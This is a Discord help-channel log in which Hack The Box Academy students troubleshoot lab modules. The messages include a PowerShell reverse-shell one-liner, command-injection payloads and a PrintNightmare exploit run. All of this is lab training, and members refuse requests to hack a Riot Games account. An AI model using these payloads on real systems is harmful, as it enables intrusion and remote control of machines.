#modules

1 messages · Page 357 of 1

midnight galleon
#

oh, so having admin priv doesn't necessarily mean local auth?

normal sand
#

The --local-auth option is used when you wish to authenticate using a local user account.

covert meteor
#

oh ty

#

where can i find the flag if ive already downloaded the file with the flag in it?

safe star
#

open the downloaded file

#

there is no need to download the file though, just curl it without the -o option

covert meteor
#

but i cant find the file

#

the flags in the file though

safe star
#

the file should be in the your current directory

covert meteor
#

where?

safe star
#

just curl the ip

#

curl ip

#

just like that

#

i got the flag no problem

covert meteor
#

wdym curl ip

#

like just the ip?

safe star
#

like you did in the example

#

just remove the -o

covert meteor
#

yeah i did but the flag is in file

#

its not here

safe star
#

bro remove the -o

#

it shouldnt be in any file

covert meteor
#

well then whats the flag? theres a bunch of stuff here!!

covert meteor
safe star
#

HTB{blahblah}

covert meteor
#

*removed

safe star
#

something like that

covert meteor
#

yeah no not there

safe star
#

you removed the -o from here?

covert meteor
#

yeah

#

it shows the sites info

#

but not the flag

urban elk
#

just show a screenshot of what you're trying and getting...

covert meteor
#

too hard

#

to take screenshot

safe star
#

are you on pwnbox or linux?

urban elk
#

good luck with everything on HTB then

covert meteor
safe star
#

?

#

how dont u see the flag

covert meteor
#

i dont it only shows website info

safe star
#

what website info?

#

i copied the command from you and removed the -o

covert meteor
#

noww i got it

#

tysm

#

i gtg now cya

safe star
sturdy swan
#

hi can you help me?
i doing the introduction to bash script
and the site dont accept my answer
why do this?

fathom pendant
#

Because your answer may be wrong

lusty thicket
sturdy swan
#

Oh thanks 🥲 i dont thing that

#

think*

south radish
#

I downloaded firefox profiles from HTB vm to my machine in ~/.mozilla/firefox directory but when I run firefox_decrypt.py, it doesn't show those profiles

sturdy swan
#

in this question i can the right answer (index = 1) and i can run the code but i dont know what can write in the submit container

#

echo $domains[1]

fathom pendant
south radish
fathom pendant
#

i don't recall running into version issues ¯_(ツ)_/¯

fading iron
#

i cant really upload the photo but the module of command injection
i use payloads in the sections but none work

urban elk
#

<@&861185840277487616>

fading iron
#

ip=127.0.0.1%0als

this do the ls , when i want to add the -la its invalid input

#

any suggestions how to add both ??

urban elk
urban sage
fathom pendant
#

So it looks like ls+-la

fading iron
fathom pendant
#

That's another way of doing it

fading iron
#

yea the section was not clear about that but it was ok 😭

fathom pendant
#

It takes some mild knowledge of linux

#

Command injections is assuming some level of knowledge of commands

limpid hemlock
#

Anyone help on identifying ssrf how to get the flag ?

twin bridge
#

Not sure if this is the right channel...but just to confirm, HTB Academy is not having any Black Friday sales right?

twin bridge
#

sad times

acoustic owl
lusty thicket
storm elk
#

This isnt hacker for hire

#

But how big? 189cm big?

halcyon ledge
#

Ohh

halcyon ledge
storm elk
#

We can not help you. Hacking is illegal

halcyon ledge
#

Ok

limpid hemlock
storm elk
#

What?

storm elk
#

Then save money

limpid hemlock
lusty thicket
simple yoke
#

Anyone have any advice for part 2 of the skills assessment in the Login Brutal Forcing module. I can't seem to connect to FTP

limpid hemlock
civic garden
lusty thicket
lusty thicket
limpid hemlock
lusty thicket
civic garden
limpid hemlock
lusty thicket
limpid hemlock
#

No the question was exploit ssrf vul to identify an internal web app access it and obtain flag i had ran a port scan and found 8000 port to be up but closed any clue how to cnnect to it Nd get flG

fathom pendant
civic garden
civic garden
#

Its missing the /

lusty thicket
limpid hemlock
#

Ah but i dont see any way to access it

#

To get the flag

lusty thicket
limpid hemlock
#

Yup via burp but getting an error

lusty thicket
fathom pendant
#

If it's not a t0 module i suggest taking this to DM to avoid spoilers

lusty thicket
#

great idea

#

@limpid hemlock you can dm @fathom pendant for this

fathom pendant
#

I haven't done this modue

#

And don't volunteer someone else to assist

lusty thicket
limpid hemlock
#

So no help i guess

fathom pendant
#

Just be patient for assistance, there's no dedicated support for skill issues

hexed oyster
#

Anyone done the File Uploads module, need some help with exiftool. the command is telling me that it doesn't support "writing of SVG images" Does anyone suggestions on how to proceed? Do I need to open it in a hex editor?

#

(I realize that's a "skill issue" question)

coarse crown
#

Italian?

lusty thicket
fathom pendant
#

It's just used as an example

hexed oyster
fathom pendant
coarse crown
fathom pendant
#

Also i suggest Deepl for better translations

coarse crown
#

thanks

storm elk
#

😅

stone jacinth
storm elk
#

I've had customers use it for translating product data. And Deepl started translating brand names

stone jacinth
#

hahahha, sounds like make direct translations

burnt spruce
#

hi guys

#

so im trying to complete a File transfering
Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer

#

i uploaded the zip file on windows and found a flag, but when im entering it, its says thats flag is wrong. Why so?

tranquil axle
#

you are supposed to run "hasher upload_win.txt" and the output of that console command is the flag, not the content of the file

burnt spruce
cedar void
#

Anyone having issues with loging into the remote windows machine in any of the hackthe box academy modules:

──╼ [★]$ xfreerdp /v:10.129.178.9 /u:htb-student /p:HTB_@cademy_stdnt! /dynamic-resolution
[12:26:56:021] [8629:8630] [INFO][com.freerdp.crypto] - creating directory /home/htb-ac-767577/.config/freerdp
[12:26:56:021] [8629:8630] [INFO][com.freerdp.crypto] - creating directory [/home/htb-ac-767577/.config/freerdp/certs]
[12:26:56:021] [8629:8630] [INFO][com.freerdp.crypto] - created directory [/home/htb-ac-767577/.config/freerdp/server]
[12:26:56:162] [8629:8630] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]
┌─[eu-academy-2]─[10.10.14.97]─[htb-ac-767577@htb-yfpn6f0kqo]─[~]
└──╼ [★]$

https://academy.hackthebox.com/module/67/section/912

analog dock
cedar void
# analog dock Put your password in single quotes

Also tried that:

xfreerdp /v:10.129.178.9 /u:htb-student /p:'HTB_@cademy_stdnt!' /dynamic-resolution
[12:30:01:792] [13373:13374] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]

#

pinged the ip address too

analog dock
#

And /cert-ignore

karmic plover
#

Just follow the xxe attack instruction in that module to read the file and you’re done

cedar void
analog dock
#

Good 🙂

burnt spruce
#

do u know why my flag is not counting?

burnt spruce
storm elk
#

Make sure there’s no spaces at the end

burnt spruce
wide moth
#

Hi. Have you passed Parameter Logic Bugs? If yes, could you give me a hint in submodule PoC and Patching - Null Safety? I'm trying to find a way how to disclosure id of the user. I've checked all functions where are used req.body and req.params + returned id. There are not so many places which return identificator, but in all cases I didn't get it. I tried to find any NoSQLi but it seems that it's not a way for decision.

cloud urchin
#

verify /etc/hosts has the right ip

pine dune
pine dune
#

why am i getting 403 :/

#

for some im getting 200 and some im getting 403

cloud urchin
#

403 means forbidden

#

aka you don't have permissions to view it

pine dune
#

is that supposed to be there?

cloud urchin
#

no idea, you didn't mention the module or section

pine dune
#

skills assessment web fuzzing

#

thats wrong answer btw ^ so not a spoiler 😅

#

I have quite a few 403s

#

but I dont think its asking for 403

cloud urchin
#

which module

#

web fuzzing isnt a module..

rustic sage
#

with ffuf

#

You need to use the proper port

cloud urchin
#

attacking web applications with ffuf?

rustic sage
#

yeah

#

probably

#

Wtf is up wit the stupid snort skil assessment

cloud urchin
#

it does actually spoil the vhost which is an answer

rustic sage
#

it dies 10 seconds after I SSH

pine dune
#

sorry yes attacking with ffuf

#

also I wasnt using the dots between the specified extensions

cloud urchin
#

careful of spoilers

pine dune
#

sorry

pine dune
#

ahh let me try with port

west canopy
harsh gorge
#

stupid question but I'm trying to do the first task on intercepting web requests and no matter how much i url encode it. i cant get it to work

#

legit every other command works but that

opal nexus
harsh gorge
#

i even verified that the flag was there

#

||ip=;cat flag.txt;||

#

This was my payload and it didnt work

opal nexus
harsh gorge
opal nexus
digital crown
#

hey, did you find answer to that question? fingerguns

digital crown
harsh gorge
#

||ip=3;cat flag.txt||

digital crown
#

i mean i dont know filename, directory etc

harsh gorge
#

nope still nothing

analog dock
digital crown
#

thanks

analog dock
harsh gorge
#

yo

#

Done

#

for anyone trying it, ||cat doesnt work but head does||

opal nexus
quasi wave
#

on the Pass the Ticket from Windows section of password attacks, it won't let me log in via xfreerdp to the windows client:

┌─[us-academy-1]─[10.10.14.239]─[htb-ac-605555@htb-fdebtjpfru]─[~]
└──╼ [★]$ xfreerdp /v:10.129.5.38 /u:Administrator /p:AnotherC0mpl3xP4$$
[16:52:34:048] [9928:9929] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[16:52:34:048] [9928:9929] [WARN][com.freerdp.crypto] - CN = MS01.inlanefreight.htb
[16:52:34:249] [9928:9929] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[16:52:34:250] [9928:9929] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[16:52:34:250] [9928:9929] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[16:52:34:250] [9928:9929] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
#

what should I do about this?

lusty thicket
quasi wave
#

ok hold on

#

that wasn't helpfuul

#

why are you responding with "idk?"

#

if you don't know why are you saying anything at all?

#

this is a Discord channel where we aim to get advice from people who either know or have a good idea of how they might be able to help

lusty thicket
#

idk buddy

quasi wave
#

when I reset the target or pwnbox it doesn't do anything

cloud urchin
#

well, your password contains special characters

quasi wave
#

ok should it be in quotes?

cloud urchin
#

operating systems will process certain special characters in other ways, it's always best to wrap it in quotes so it's a literal string

#

you can try echoing the word without in the terminal and see if it echos back correctly

quasi wave
#

I did that and it didn't work but now I'm restarting target and trying again with quotes

#

will try double quotes then single

cloud urchin
#

single quotes for literal string

quasi wave
#

ok

cloud urchin
quasi wave
#

thanks single quotes worked

#

ok solved first two questions on my own

#

I'll let you know if I have any more issues

#

I solved all three questions on my own. I'm gonna do the optional challenge tomorrow after I take notes on the section again on my own.

#

that way I can make sure I really understand it before I move onto next piece of material

cloud urchin
#

not what this discord is about

narrow hollow
#

My bad

fading seal
#

🤔
https://academy.hackthebox.com/module/158/section/1432

Target(s): 10.129.87.54 (ACADEMY-PIVOTING-LINUXPIV)

after doing:
$ sudo sshuttle -r ubuntu@10.129.87.54 172.16.5.0/23 -v

i tried to nmap the windows box with:
nmap -v -sV -p3389 172.16.5.19 -A -Pn

i cant find the open port but i noticed that the traceroute doen't show tun0 nor ubuntu pivot host,
it shows my VM hop and my home router hop

is this normal?
any idea of how can i approach this issue?

#

nvm, xfreerdp works

#

ok -sT -.-

fast mountain
#

couldsomeone help me do a command

storm elk
fast mountain
#

generating

#

every single possible combination for a 6 digit number

waxen totem
#

that my friend would be a script, not a command

fast mountain
#

oh

#

sry i dont know much

#

and i wanted those combinations to be tested at superhuman speeds on a certain website

cloud urchin
#

which module?

#

the broken auth module goes over the command

fast mountain
#

huh

#

idk what those are

cloud urchin
#

this channel is for htb's academy platform

#

are you trying to brute-force a website on the internet?

cloud urchin
#

yeah i don't really see many roe's allowing brute forcing

cloud urchin
fast mountain
#

on a website

storm elk
#

Rooobooox

cloud urchin
#

yeah which website

fast mountain
#

i wanted to see if it would work on myself

#

riot games

cloud urchin
#

lol

#

no one here can help you with that. not worth going to prison for riot games

fast mountain
#

wdym

#

im doing it on myself

storm elk
#

I’m quite sure if they find out, your account t will be banned

cloud urchin
#

it's illegal buddy

fast mountain
#

i dont get it

#

why illegal

#

if my account

cloud urchin
#

reach out to riot support if you need into your account and you lost access, no one here can help you. anyone private messaging you saying they can is lying and scamming you.

fast mountain
#

oh

storm elk
#

It’s not your account most likely. You’re allowed to create an account and use it, but the account is still from the company where you created it

fast mountain
#

ohh

cloud urchin
#

that's true too

fast mountain
#

but what if my account was compromised

#

and the shitters down in riot games cant answer your email

cloud urchin
#

then reach out to riot no one here can help you, no riot staff is here

fast mountain
#

hypoteticaly

long kestrel
#

😆

cloud urchin
#

again no one's going to prison to try to get "your" account

fast mountain
#

it is mine

#

someone hacked me and changed my info

cloud urchin
#

well i'm not going to keep going in circles

fast mountain
#

i have another question

#

that is legal

cloud urchin
#

ask in #general unless it's related to academy

fast mountain
#

aw man

#

you probably know how to

#

it doesnt let me talk there

cloud urchin
fast mountain
#

it being atistic

#

no work

storm elk
#

It’s three easy steps

fast mountain
#

im brainded

#

easy for you is hell for me

storm elk
#

But yeah, this isn’t hacker for hire. If that’s what you’re after, this isn’t the server for you

waxen totem
#

inhales in dad "Hello braindead"

fast mountain
#

i was just wondering

#

how to get kali linux

storm elk
#

You go to the website and download it

waxen totem
fast mountain
#

it doesnt work

waxen totem
#

go to youtube, watch a tootoorial

cloud urchin
#

i'll leave it on your moms nightstand tonight for you in the morning

fast mountain
#

i already did

#

plss

waxen totem
#

I'm just gonna say: if you can't figure out how to get it, you probably won't be able to figure out how to use it

fast mountain
#

i have picture

#

its notworking

cloud urchin
#

my guy, this channel is for the hackthebox academy playform you'll need to ask in another channel

storm elk
#

This isn’t the channel to help you with setting up a vm

fast mountain
#

but general no work

storm elk
#

Read and follow the three steps in #welcome

fast mountain
#

i already try

storm elk
#

Try again.

fast mountain
#

what do i type in this

#

/ identify (account_identifier)

storm elk
#

Read the steps again

karmic plover
storm elk
#

He figured it out now

karmic plover
#

Hope so

midnight verge
storm elk
cloud urchin
#

i wonder how long he lasts

crimson moon
#

in pivoting and tunnelling section, RDP AND SOCKS tunnelling with SocksOverRDP not able to execute SocksOverRDPPlugin.dll even though defender is off.

cloud urchin
#

running as admin?

crimson moon
#

Yes cmd as admin

midnight verge
#

.

crimson moon
crimson moon
midnight verge
#

redownload it , unzip the file , cd into SockOverRDP-x64 and run : regsvr32.exe SocksOverRDP-Plugin.dll

crimson moon
grizzled mauve
#

someone knows how can I cheat using lockdown browser in a classroom?

cloud urchin
#

you can dm me if you want

waxen totem
#

noticing a trend here...

seems half of all people who join just want something hacked...

vague tundra
#

in the pivoting module, "Socat Redirection with a Reverse Shell" section, how can I run the payload on the windows pivot target?

cloud urchin
#

there's socat for windows if you google it

vague tundra
#

How to transfer the payload there in the first place

cloud urchin
#

there are several ways to transfer files.. socat uses ssh so i'd probably use scp

#

did you complete the file transfer module?

vague tundra
#

scp on windows huh

cloud urchin
#

on windows i like to rdp

vague tundra
#

Are you saying there is an scp server running on the windows target waiting for connections?

cloud urchin
#

no

vague tundra
#

I am not sure you are getting what I am saying

vague tundra
cloud urchin
#

sure you can, in my notes i'm using rdp

vague tundra
cloud urchin
#

tunneling through it i believe

vague tundra
#

if we need a tunnel already setup then what's the point of socat redirection

cloud urchin
#

it explains in the module, you can use it as a redirector.. you can use it to establish rdp, or whatever you want

vague tundra
gray silo
#

hyy anyone doing ctf? may i join u guys . plz

grand portal
#

Module: Attacking common services.
Section: EASY LAB.
You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer.
i tried various bruteforcing methods, nothing has worked out so far, during mysql bruteforcing `[ERROR] Host '10.10.14.60' is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts' i get this error.

#

any hint would be helpful

south radish
#

Module: Shells & Payloads
Section: Reverse Shells
When I run powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.15.25',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" on target machine I get so many syntax errors. I don't know why because it is same payload as in the section

#

Also, when I try to disable AV, it says that I don't have permission but in section, they successfully disabled it with normal user

south radish
#

Thanks, it works now

opal nexus
south radish
#

It didn't work because I ran it in powershell instead of cmd

dark hedge
#

encode the command, then you can run it in powershell

wooden seal
#

Information Gathering - Web Edition (Virtual hosts)
vHosts needed for these questions:
inlanefreight.htb
cant enumerate using domain (inlanefreight.htb)
Things i did already

adding ip and domain to entry file

chilly echo
chilly echo
glacial lava
#

anyone know if there is something going on with the Academy-Login Brute Forcing-Web Services box? I am unable to ssh in, it rejects the cert

knotty anvil
#

<@&861185840277487616>

#

<@&861185840277487616>

glacial lava
knotty anvil
#

lmao

wooden seal
wary plover
#

you need to disable "Allow external apps" settings @low girder , but maybe this needs to come from a admin like @surreal rain

knotty anvil
#

admin to the rescue

fringe oxide
#

wtf

fathom pendant
#

I just blocked them

knotty anvil
wary plover
#

you can't lmao a stupid feature of discord lol, this guy saw a NTTS vid and thought he was cool

green minnow
#

Anyone know why gobuster is throwing this error

Error: unknown shorthand flag: 'x' in -x```
#

And this gobuster vhost -u http://inlanefreight.htb:35914/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --append-domain -s 157:157 Error: unknown shorthand flag: 's' in -s

#

It's acting like it doesn't know those flags

#

I need to filter a lot of false positives for the web fuzzing module

#

Also this is failing
gobuster dns -d http://inlanefreight.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
Unable to validate base domain: http://inlanefreight.htb (lookup http://inlanefreight.htb: no such host)

wary plover
urban sage
wary plover
urban sage
chilly echo
rustic sage
#

Guys, I need help with this question:
How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
This is the command I am running to get the results:

ss -tuln4 | grep 'LISTEN' | grep -v '127.0.0.1' | wc -l

Output: 8
But the module is saying its incorrect...

#
tb-student@nixfund:~$ ss -tuln4 | grep 'LISTEN' | grep -v '127.0.0.1'
tcp    LISTEN   0        50                 0.0.0.0:139           0.0.0.0:*     
tcp    LISTEN   0        100                0.0.0.0:110           0.0.0.0:*     
tcp    LISTEN   0        100                0.0.0.0:143           0.0.0.0:*     
tcp    LISTEN   0        128          127.0.0.53%lo:53            0.0.0.0:*     
tcp    LISTEN   0        128                0.0.0.0:22            0.0.0.0:*     
tcp    LISTEN   0        50                 0.0.0.0:445           0.0.0.0:*     
tcp    LISTEN   0        100                0.0.0.0:993           0.0.0.0:*     
tcp    LISTEN   0        100                0.0.0.0:995           0.0.0.0:*
#

This is clearly 8 tcp listening...

green minnow
#

I remember using that exact same command and being very annoyed at that question

waxen totem
rustic sage
waxen totem
# rustic sage Why?

blame the people who chose our ip addresses
localhost is a range from 127.0.0.0-127.255.255.255

bold osprey
#

guys i am stuck on Firewall and IDS/IPS Evasion - Easy lab. Any hints?

green minnow
#

"Using GoBuster against inlanefreight.com to fuzz for subdomains using the subdomains-top1million-5000.txt wordlist, which subdomain starts with the prefix "su"?"

According to gobuster there isn't one:

Found: ns1.inlanefreight.com
Found: ns2.inlanefreight.com
Found: blog.inlanefreight.com
Found: ns3.inlanefreight.com
Found: my.inlanefreight.com
Found: customer.inlanefreight.com```
#

I ran it 3 times

waxen totem
acoustic owl
green minnow
#

I'm using the one they want you to use. subdomains-top1million-5000.txt

#

gobuster dns -d inlanefreight.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

waxen totem
#

try using vhost mode instead?

acoustic owl
green minnow
#

The question is confusing it says subdomains and vhost

#

Using GoBuster against inlanefreight.com to fuzz for subdomains using the subdomains-top1million-5000.txt wordlist, which subdomain starts with the prefix "su"? Respond with the full vhost, eg web.inlanefreight.com.

acoustic owl
green minnow
#

So you want subdomain or vhost?

green minnow
#

It's found using the subdomains-top1million-20000.txt wordlist. So the question is worded wrong.

green minnow
#

I think the asking for vhost part is also incorrect

acoustic owl
cunning peak
#

i don't want to use the web-based Pwnbox , can i install vpn or something to my kali vm ?

green minnow
#

odd grep'ing the 5000 .txt returns the subdomain but gobuster failed 3 times to find that subdomain when told to use the 5000.txt file

acoustic owl
green minnow
#

But then the 20000 .txt worked for some reason. But I confirmed the word is in the shorter wordlist. So I don't know the issue

acoustic owl
#

I can send you a DM to show you that GoBuster does exactly what it is supposed to do

waxen totem
acoustic owl
cunning peak
#

how

acoustic owl
green minnow
#

Maybe I should just use ffuf

waxen totem
acoustic owl
cunning peak
#

Thank you so much! I was struggling with my crappy internet

acoustic owl
#

However, if your internet connection is weak, you are better off using the PwnBox.

eager zinc
#

can someone tell me what is wrong? im trying to brute force vhost from an ip

waxen totem
#

you can't get subdomains from an ip

eager zinc
#

so what i should do?

waxen totem
eager zinc
#

i was using worng arguments

waxen totem
#

the question is asking for subdomains not directories

fathom pendant
#

7

#

It's literally told in the engagement

#

And yes

leaden island
#

I used netstat -l | wc -l but the number was incorrect

waxen totem
leaden island
#

I thought it said it needs everything, not ipv4 and localhost only

#

That would be something like netstat -lt | wc -l then

#

Wait not t

#

-l4

#

ss -4 lists ipv4 but not sure how its done on netstat

waxen totem
#

it should be the same

leaden island
#

Im gonna reach my pc rq

eager zinc
#

i treid 11000 and only found 5 sub domains

waxen totem
#

crazy

#

@green minnow

green minnow
#

This was the exact same thing that happened to me FeelsWeirdMan

waxen totem
#

yeah now I'm asking how you fixed it

eager zinc
#

how am i suppose to find the sub-domains

green minnow
eager zinc
#

gobuster vhost -u http://inlanefreight.htb:81 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain

green minnow
#

So two different people have had gobuster fail to find that subdomain around the same time

waxen totem
green minnow
shrewd coyote
#

Guys, I am getting started with the basics and I am taking on the operating system fundamentals path and in the linux fundamentals module, section on system information there are two questions that dont make sense. I need help understanding.

01 - What is the path to the htb-student's mail?
02 - Which shell is specified for the htb-student user?

I was able to manage the rest, but these ones are not clear, any help please? Thanks!

eager zinc
#

but that too doesnt seem to be working

green minnow
#

Try using the top1million-20000.txt thats the one I used

eager zinc
#

okey ill try

waxen totem
eager zinc
#

what about the ip?

green minnow
#

for this one you need to use the vhost mode

eager zinc
eager zinc
#

got nothing on that

#

its confusing, im at this for 1-2hr

green minnow
#

It's two different questions

waxen totem
#

also you can't enumerate subdomains with ip

green minnow
#

Top one is vhost fuzzing on .htb. Second is subdomain fuzzing on .com

eager zinc
green minnow
#

Although it doesn't help they also use the word vhost in the second question

eager zinc
#

Information Gathering - Web Edition -> Virtual Hosts module

fathom pendant
#

Use vhost enumeration i.e. -H "HOST: FUZZ.inlanefreight.htb"

eager zinc
#

okey thanks ill try that

analog dock
#

Ffuf kit_Exportingdrugs

shrewd coyote
acoustic owl
leaden island
#

I tried increasing/decreasing for extra lines from netstat still no work

waxen totem
leaden island
#

Commands

#

netstat -l4 | wc -l

waxen totem
#

read the last part of the question again

#

you're missing some key filtering

leaden island
#

As i understood

#

It needs: ipv4 and localhost

#

I think my problem is more with english lol

#

Or

#

No or

waxen totem
#

idk question is weird, just get rid of the localhosts

#
How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)

not localhost

IPv4 only
treat em as separate

#

also for question 3 on that same module here's your hint:

find things inside single ' and double " quotes

leaden island
#

I did -4 , which means ipv4 only

#

Let me try again

fathom pendant
waxen totem
#

@leaden island this ^

leaden island
#

Thats a lot of filtering lol

#

I need to know whats going on

waxen totem
leaden island
#

T for tcp

#

U for udp

#

4 for ipv4

#

L for listen

#

N for hmm not sure

waxen totem
#

basically don't follow domains

leaden island
#

Ooooooo

leaden island
#

Okay i decremented 1 and it worked

waxen totem
leaden island
#

Yeah

#

thank yall very much

#

Ive been stuck on this for a day literally

waxen totem
#

read the 3rd question

leaden island
#

Use curl from your pwnbox to obtain the source code of the 'url' and filter unique paths of that domain

waxen totem
#

Yep, cried so hard on that one

leaden island
#

This should be easier

fathom pendant
#

I just used a solution on the forums for it

#

¯_(ツ)_/¯

leaden island
waxen totem
#

here's your help for it before I go to sleep (cos I can guarantee you ain't gettin it also so you don't need the forum)
||curl https://www.inlanefreight.com > temp.txt && cat temp.txt | tr " " "\n" | cut -d"'" -f2 | cut -d'"' -f2 | grep www.inlanefreight.com | sort -u | wc -l ||

there's an easier way to do this but REGEX is the next module so...

said regex:

||curl https://www.inlanefreight.com | grep -Eo "www.inlanefreight.com[^'\"]* | sort -u | wc -l"||

fathom pendant
#

It requires some HTML knowledge and such to properly filter

leaden island
fathom pendant
bold osprey
#

Hey guys i am stuck on Firewall and IDS/IPS evasion - hard lab. Any tips?

leaden island
fathom pendant
fathom pendant
leaden island
#

At the same time i appreciate it being hard

#

It rly teaches u fundemental

fathom pendant
bold osprey
fathom pendant
leaden island
#

Im missing a lot here

waxen totem
bold osprey
waxen totem
#

edging on not very surface knowledge

fathom pendant
#

Heck even chatgpt/AI isn't your enemy for explaining things

#

Or a tool like explainshell if you find a command online

waxen totem
#

ahh yes chat ji-pi-ty, the one stop shop to anything text based

fathom pendant
#

Don't expect AI to craft you a functioning one liner

#

But it can explain things (that are documented)

bold osprey
bold osprey
eager zinc
# eager zinc

im stuck at this for hrs! can anyone help me enumerate vhost using gobuster

fathom pendant
#

Also, why not use a Stealth scan instead

bold osprey
fathom pendant
bold osprey
#

alr let me see

fathom pendant
#

--append-domain does nothing if you don't have a domain to tell it

eager zinc
#

where to look for domain, domian given is inlanefreight.htb but that does not exist and ip wouldnt work

fathom pendant
eager zinc
#

yeah but what should i put in that

eager zinc
fathom pendant
#

For vhost

eager zinc
fathom pendant
#

i always use ffuf ¯_(ツ)_/¯

rustic dew
#

Hi All, I'm currently attempting the "Bleeding Edge Vulnerabilities" of "Active Directory Enumeration & Attacks", I've confirmed the target is vulnerable to PrintNightmare, I am then attempting to create the msfvenom payload with the syntax provided within the module, when I get the following: "-bash: backupscript.dll: Permission denied", I've tried running this with sudo on the attack host, has anyone else encountered this? Done a quick search for 'backupscript.dll', and I can't see any historic comments/questions in here pertaining to this exactly...

eager zinc
lusty thicket
eager zinc
#

yes

#

got no found

lusty thicket
eager zinc
vague tundra
#

Hello, in the "ICMP Tunneling with SOCKS" section in pivoting module, I need to build ptunnel-ng but the glibc on my host is 2-3.6 and the one on the target is 2-3.1, what's a wordaround?

lusty thicket
rustic dew
# rustic dew Hi All, I'm currently attempting the "Bleeding Edge Vulnerabilities" of "Active ...

So managed to work around this by creating the msfvenom payload on my local instance of Kali, and then transferring the .dll to the attackbox using python http.server... now when I try and run the CVE.py, I'm getting another error:
┌─[htb-student@ea-attack01]─[/opt/CVE-2021-1675]
└──╼ $sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\172.16.5.225\CompData\backupscript.dll'
[] Connecting to ncacn_np:172.16.5.5[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[
] Executing ??\UNC\172.16.5.225\CompData\backupscript.dll
[*] Try 1...
Traceback (most recent call last):
File "/opt/CVE-2021-1675/CVE-2021-1675.py", line 188, in <module>
main(dce, pDriverPath, options.share)
File "/opt/CVE-2021-1675/CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20211013.152215.3fe2d73a-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 636, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20211013.152215.3fe2d73a-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 880, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified.

There's always something with these modules....

eager zinc
#

i think this is wrong im getting too much output to make sense of

lusty thicket
#

confirm you transferred the dll to that path

lusty thicket
vague tundra
lusty thicket
eager zinc
surreal chasm
#

Didnt really understand the point in Catching Files over HTTP/S under File Transfers
What are they talking about? Setup an Nginx on the targeted network?

eager zinc
#

im getting 200 for everything

lusty thicket
eager zinc
#

how to do so

surreal chasm
#

try -fs 10918,116

eager zinc
#

ok

vague tundra
eager zinc
lusty thicket
#

the line

vague tundra
lusty thicket
vague tundra
#
#!/bin/bash

set -x

OLD_WD="$(pwd)"
NEW_WD="$(dirname ${0})"

cd "${NEW_WD}"

if ! autoreconf -fi; then
    aclocal
    autoheader
    automake --force-missing --add-missing
    autoconf
fi

cd "${OLD_WD}"

"${NEW_WD}/configure" $@ && make clean && make -j${BUILDJOBS:-4} all
#

aight so chat gave me sth gonna try it

surreal chasm
#

Or it's just stating another way to setup a webserver?

lusty thicket
surreal chasm
#

Just dont understand the point of this module

leaden island
rustic dew
leaden island
#

its awsome

#

espically in computer architecture things

surreal chasm
lusty thicket
#

not a file

vague tundra
rustic dew
lusty thicket
#

awesome!

vague tundra
#

wait lol there was a even a guide on how to build a static binary in the section but I didn't pay attention lol

#

I didn't even realize what static meant at that point

#

but if it works it works so whatever

manic geyser
#

can someone explain to me what does this question is asking me to
ik theres smt in the script.js

lusty thicket
regal furnace
#

File Upload Attacks - Skills Assessment
Hello guys, I need some helps here for the file upload attacks module - final skill assessment. I've been successfully got the upload.php source code, and got the uploaded file directory is "./user_feedback_submissions/", I've changed filename as per requirement "241130_image.jpg". After upload this file, I still cannot reach the uploaded file in the target directory: "http://83.136.254.158:53442/contact/user_feedback_submissions/241130_image.jpg" It returns a 404 not found page. So, I cannot get a POST request in BuipSuite and cannot move forward. Could someone help me to check and find the problems? Thanks!

vague tundra
#

This RDP Tunneling double pivoting module was real rough

knotty anvil
weak kindle
#

Anyone has completed the Active Directory Trust Attacks? I'm in the skill test and the very last question, please reply to this message I will DM you!

eager zinc
#

how to fingerprint vhost using nikto?

signal pike
#

Yo guys, I am currently doing the Password Attacks module, and there is a section where we need to get a NTDS.dit file, when I transfer this file to my attackmachine, how can I get the hashes of this file, what command can I use?

lusty thicket
#

